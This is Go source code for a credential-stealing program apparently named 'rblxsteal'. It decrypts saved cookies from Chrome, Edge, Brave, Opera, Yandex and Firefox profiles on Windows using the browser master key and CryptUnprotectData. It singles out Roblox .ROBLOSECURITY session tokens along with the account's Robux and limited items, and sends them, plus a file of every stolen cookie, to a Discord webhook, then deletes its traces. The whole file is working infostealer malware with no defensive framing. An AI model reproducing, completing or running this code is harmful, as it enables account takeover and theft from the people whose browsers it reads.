package main import ( "crypto/aes" "crypto/cipher" "database/sql" b64 "encoding/base64" "encoding/json" "fmt" "io/ioutil" "log" "math/rand" "os" "path/filepath" R "rblxsteal/roblox" "strings" "syscall" "unsafe" "github.com/DisgoOrg/disgohook" "github.com/DisgoOrg/disgohook/api" _ "github.com/mattn/go-sqlite3" ) var webhook string = "webhook here" var webhook_id string = strings.Split(webhook, "/")[5] + "/" + strings.Split(webhook, "/")[6] type BrowserPath struct { name string processname string token string password string cookies string extensions string } type Output struct { host_key interface{} name interface{} enc interface{} } type PasswordOutput struct { url string username string password []byte } type MozCookies struct { host string name string value []byte } type Cookies struct { url string name string value string } type mystruct struct { Hello string `json:"hello,omitempty"` } type DATA_BLOB struct { cbData uint32 pbData *byte } func NewBlob(d []byte) *DATA_BLOB { if len(d) == 0 { return &DATA_BLOB{} } return &DATA_BLOB{ pbData: &d[0], cbData: uint32(len(d)), } } func unencrypt(buff []byte, master_key []byte) string { starts := string(buff[:3]) if starts == "v10" || starts == "v11" { iv := buff[3:15] payload := buff[15:] block, err := aes.NewCipher(master_key) if err != nil { panic(err.Error()) } aead, err := cipher.NewGCM(block) if err != nil { panic(err.Error()) } decrypted_pass, err := aead.Open(nil, iv, payload, nil) if err != nil { panic(err.Error()) } return string(decrypted_pass) } return "" } func (b *DATA_BLOB) ToByteArray() []byte { d := make([]byte, b.cbData) copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:]) return d } func GetEncryptionKey() []byte { local_path := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Local", "Google", "Chrome", "User Data", "Local State") local_state_data, err := ioutil.ReadFile(local_path) if err != nil { } data := make(map[string]interface{}) err = json.Unmarshal([]byte(local_state_data), &data) if err != nil { } os_crypt := data["os_crypt"].(map[string]interface{}) key := os_crypt["encrypted_key"] decoded_key, _ := b64.StdEncoding.DecodeString(key.(string)) unprotected_key := decoded_key[5:] decreyptedkey, e := Decrypt(unprotected_key) if e != nil { } return decreyptedkey } func Decrypt(data []byte) ([]byte, error) { dllcrypt32 := syscall.NewLazyDLL("Crypt32.dll") procDecryptData := dllcrypt32.NewProc("CryptUnprotectData") dllkernel32 := syscall.NewLazyDLL("Kernel32.dll") procLocalFree := dllkernel32.NewProc("LocalFree") var outblob DATA_BLOB r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob))) if r == 0 { return nil, err } defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData))) return outblob.ToByteArray(), nil } const letterBytes = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" func checkPathExists(p string) bool { _, err := os.Stat(p) if err == nil { return true } if os.IsNotExist(err) { return false } return false } func RandStringBytes(n int) string { b := make([]byte, n) for i := range b { b[i] = letterBytes[rand.Intn(len(letterBytes))] } return string(b) } func getCookies(path string, cookiePath string, cookies []Cookies) []Cookies { if !checkPathExists(path) { return cookies } pathC := path + cookiePath + "/Cookies" if !checkPathExists(pathC) { return cookies } random_path := "kur" + RandStringBytes(8) + ".db" f, _ := ioutil.ReadFile(pathC) os.Create(random_path) os.WriteFile(random_path, f, 0644) db, err := sql.Open("sqlite3", random_path) if err != nil { log.Fatal(err) } defer db.Close() row, err := db.Query("SELECT host_key, name, encrypted_value FROM cookies") os.Remove(random_path) if err != nil { log.Fatal(err) } pathKey := path + "/Local State" local_state_data, err := ioutil.ReadFile(pathKey) if err != nil { log.Fatal(err) } data := make(map[string]interface{}) err = json.Unmarshal([]byte(local_state_data), &data) if err != nil { log.Fatal(err) } os_crypt := data["os_crypt"].(map[string]interface{}) key := os_crypt["encrypted_key"] decoded_key, _ := b64.StdEncoding.DecodeString(key.(string)) unprotected_key := decoded_key[5:] decreyptedkey, e := Decrypt(unprotected_key) if e != nil { os.Exit(0) } defer row.Close() for row.Next() { var rowout Output row.Scan(&rowout.host_key, &rowout.name, &rowout.enc) cookie := unencrypt(rowout.enc.([]byte), decreyptedkey) tmpCookie := Cookies{rowout.host_key.(string), rowout.name.(string), cookie} cookies = append(cookies, tmpCookie) } return cookies } func firefox(cookies []Cookies) []Cookies { path := os.Getenv("APPDATA") + `\Mozilla\Firefox\Profiles` if !checkPathExists(path) { return cookies } folders, err := os.ReadDir(path) firefox_cookies := []string{} if err != nil { log.Fatal(err) } for _, dir := range folders { subdir_content, err := os.ReadDir(path + "\\" + dir.Name()) if err != nil { log.Fatal(err) } for _, file := range subdir_content { if file.Name() == "cookies.sqlite" { firefox_cookies = append(firefox_cookies, path+"\\"+dir.Name()+"\\cookies.sqlite") } } } for _, i := range firefox_cookies { tmpfp := "kur" + RandStringBytes(8) + ".db" f, _ := ioutil.ReadFile(i) os.Create(tmpfp) os.WriteFile(tmpfp, f, 0644) db, err := sql.Open("sqlite3", tmpfp) defer db.Close() defer os.Remove(tmpfp) if err != nil { os.Remove(tmpfp) log.Fatal(err) } row, err := db.Query("SELECT host, name, value FROM moz_cookies") for row.Next() { var rowout MozCookies row.Scan(&rowout.host, &rowout.name, &rowout.value) tmpCookie := Cookies{rowout.host, rowout.name, string(rowout.value)} cookies = append(cookies, tmpCookie) } } return cookies } func createCookiesFile(cookies []Cookies) string { outStr := "" for _, i := range cookies { outStr += fmt.Sprintf("URL: %s | NAME: %s | VALUE: %s\n", i.url, i.name, i.value) } return outStr } func createRobloxDiscordWh(data R.UserInfo) { webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id) tosend := fmt.Sprintf("`User ID: `: `%d`\n`User Name`: `%s`\n`Robux`:`%d`\n`BuildersClub`:`%t`\n`Premium`:`%t`\n__Limiteds__ \n```", data.UserID, data.UserName, data.Robux, data.BuildersClub, data.IsPremium) for _, asset := range data.Limiteds { tosend += fmt.Sprintf("Name: %s | RAP: %g\n", asset.Name, asset.RecentAveragePrice) } tosend += "```" tosend += fmt.Sprintf("\n`Token`: `%s`", data.Token) webhook.SendContent(tosend) } func main() { allCookies := []Cookies{} roaming := os.Getenv("APPDATA") local := os.Getenv("LOCALAPPDATA") operaGx := BrowserPath{roaming + "/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} opera := BrowserPath{roaming + "Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} operaNeon := BrowserPath{roaming + "/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} chrome := BrowserPath{local + "/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} chromeSxs := BrowserPath{local + "/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} brave := BrowserPath{local + "/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} yandex := BrowserPath{local + "/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn"} edge := BrowserPath{local + "/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn"} browserPaths := []BrowserPath{operaGx, opera, operaNeon, chrome, chromeSxs, brave, yandex, edge} for _, i := range browserPaths { allCookies = getCookies(i.name, i.cookies, allCookies) } allCookies = firefox(allCookies) rblxCookies := []string{} for _, i := range allCookies { if i.name == ".ROBLOSECURITY" { rblxCookies = append(rblxCookies, i.value) } } if len(rblxCookies) != 0 { rblxstuff := R.GetRobloxStuff(rblxCookies) for _, i := range rblxstuff { createRobloxDiscordWh(i) } } towrite := createCookiesFile(allCookies) os.Create("COOKIES.txt") os.WriteFile("COOKIES.txt", []byte(towrite), 0644) webhook, _ := disgohook.NewWebhookClientByToken(nil, nil, webhook_id) reader, _ := os.Open("COOKIES.txt") webhook.SendMessage(api.NewWebhookMessageCreateBuilder().SetContent("All Cookies logged").AddFile("COOKIES.txt", reader).Build()) os.Remove("COOKIES.txt") here, _ := os.ReadDir("./") for _, i := range here { if strings.HasSuffix(i.Name(), ".db") { os.Remove(i.Name()) } } }